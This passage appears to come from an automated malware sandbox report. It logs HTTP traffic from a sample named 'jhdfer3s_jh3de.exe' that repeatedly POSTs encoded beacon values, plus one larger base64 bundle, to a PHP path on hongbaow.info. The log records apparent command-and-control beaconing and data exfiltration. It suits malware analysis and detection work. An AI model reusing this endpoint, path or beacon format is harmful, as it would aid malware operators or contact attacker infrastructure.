                            server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1777&rtt_var=692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1552365&cwnd=237&unsent_bytes=0&cid=d8320add37373834&ts=323&x=0"
                            2025-01-22 07:36:49 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            73192.168.2.450076104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:49 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:49 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:49 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8xi2zbO3P4hcTfVMmu1PeGyJjl6KlfhyggQCCMRWXD2nGMrHGcWGgthnE5B4Yod8YspvDqFpsERr5H8CNK7pT5osQgP%2FjSPgHRH3RQlW4c1owP6Yh7cWp%2FiAnRbPWXY3"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de00f0b708ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1785&rtt_var=679&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1600877&cwnd=237&unsent_bytes=0&cid=7e76c7ba57a06d60&ts=332&x=0"
                            2025-01-22 07:36:49 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            74192.168.2.450077104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:50 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:50 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:50 UTC815INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4Jy%2BJ9udt5FJHNso%2F5RbQxEThxBuoqliyr9jqtuwMqZpE6IiVGRs7%2FGZZj3m%2Ff%2Byw6CJ02LvmAtlJt8Q%2BQjBx7WIPHcy7evQ45leDTjHomueCysue%2FBOkhjlUK9Iaid"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0144ad94414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1562&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1805813&cwnd=180&unsent_bytes=0&cid=53803dee636adc1d&ts=329&x=0"
                            2025-01-22 07:36:50 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            75192.168.2.450078104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:51 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:51 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:51 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:51 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VF8Q%2FA068yUMUTF3DHAwMr%2Bg5jd%2BkIYddhiH5n8UoQ3cgbAW5GnE8%2FTo969UiRVV%2FPAH4dgFiwNM3Tbh0S3YhiBYC6mPzILyjKxHNT3gLUveYL%2BQodVZZEmuBN6gJyM"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de019bee18ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1818&rtt_var=698&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1606160&cwnd=237&unsent_bytes=0&cid=93b42f684b067e3b&ts=335&x=0"
                            2025-01-22 07:36:51 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            76192.168.2.450079104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:52 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:52 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:52 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:52 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U97EQE4Ux63RJWBmLrCloxAMVK%2F6%2FS8C1D0mNruk5tF63RMxRJy3Wp44NboDtjcw%2FnQXn68Fue5uiKG55uQvyDB6jscLyeTbn5qXK9q2W%2BmTbGBF0LD9JuCpxdbxZrau"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de01ef8f442eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1596&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1829573&cwnd=215&unsent_bytes=0&cid=49e33018b8f1d885&ts=343&x=0"
                            2025-01-22 07:36:52 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            77192.168.2.450080104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:53 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:53 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:53 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:53 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08r4vu6pU34MAUZ50z9hxQEIebNRehqVTMwhLzlK0BoxcUfoYoV3CmoWb6AjgJ5ry2pCA%2F1mcGmfFzGj1FpT4cjnKqa%2ByvAGYFLEopdCcr5zFxe%2FCCswaZd6dt%2FK5SOS"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0243ef5c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1532&rtt_var=580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1875401&cwnd=155&unsent_bytes=0&cid=8846f7a5adb36b8f&ts=319&x=0"
                            2025-01-22 07:36:53 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            78192.168.2.450081104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:53 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:53 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:53 UTC804INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:53 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09ZIBcSiwtMmfRMzweC41iECfQHJ7m78T0ANUvdbAOmEYdGxPiw05X1VHz0uIAnb2VtLhXkG6KwY1Tzu87iY%2B1OgY94fTdr6WOUQcBjQnZ3yxxZDXVeOEBOfhubLi4U8"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de026df90c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1571&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1781574&cwnd=155&unsent_bytes=0&cid=2fcdad99caa83dba&ts=337&x=0"
                            2025-01-22 07:36:53 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            79192.168.2.450082104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:53 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:53 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:54 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hha%2BYczal%2BvztdyXXazWCl1pO%2FRp%2BwLdZwpKkr4J0zj6vcUZ2Sc7nqRQftvMzv6uGCGoNY2vQyukJMvTcTIvQzIROAVFnrrC%2BMmWYJyzDvK86DA6udbSGmwu1b2JQUWL"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0294bf6de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1486&rtt_var=561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1965006&cwnd=246&unsent_bytes=0&cid=e5493b49440e4932&ts=307&x=0"
                            2025-01-22 07:36:54 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            80192.168.2.450083104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:54 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:54 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:55 UTC815INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdwsRABaUUk9bcCaTvqjq2mj02jze%2FBM%2BBLKviMA3lRtWl%2Bl1DGmPc%2BaGZ9Ejxy2lhBtGK%2BU3Kfz2ocUXnawTIc2tgTDHo3qvEom1uHfQfWx0ot%2FrrZ%2FNPxNGcLw8ty7"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de02e79a9c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1483&rtt_var=569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1901041&cwnd=155&unsent_bytes=0&cid=568bb57c384a0e3c&ts=337&x=0"
                            2025-01-22 07:36:55 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            81192.168.2.450084104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:55 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:55 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:55 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:55 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pMeqtARROEWaHkCU3ehIzjxZEu8LUsYNWPGJUge9r0tf34embwNg1IG%2FacTN%2FEuG29wyfrJ6j5wwe36fVwe0luRzenLiIQrd5AMwqzAYoCrVC76O6%2FiA7SmQoulvoxiO"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0338feb7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=678&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1613259&cwnd=218&unsent_bytes=0&cid=6198cfc0a4793273&ts=323&x=0"
                            2025-01-22 07:36:55 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            82192.168.2.450085104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:56 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:56 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:56 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:56 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7l6qk1EQycygK22qPBiZqDl3Dpq2SGoW6ZFUH5wGL5mD2EKfHTGMTzrv9TW2fPJS%2F%2BsHmElDCMYfB%2FmhJ0RdXUadUMkmnAQq5vyLPhD3L8kYrNCmV16dwiyeruB6u%2BlR"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0390c0d42eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1576&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1825000&cwnd=215&unsent_bytes=0&cid=0bb1a22b23425256&ts=340&x=0"
                            2025-01-22 07:36:56 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            83192.168.2.450086104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:57 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:57 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:57 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9la1N66dtQwXQSXviObe00HL8DdZhxDrKDLbnbjY%2BhRG4iFMFWawjqeaolAzqVPj3t0WAZy%2Fl3Gf9WcI5wmpUyGTTrq4C%2B1WTDZpwI9YeQLiclVEwbWKHpRFsofIegg"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de03e58f68ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1757&rtt_var=696&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1531200&cwnd=237&unsent_bytes=0&cid=87ae797ebbe3f1dd&ts=349&x=0"
                            2025-01-22 07:36:57 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            84192.168.2.450087104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:58 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:58 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:58 UTC815INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:58 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
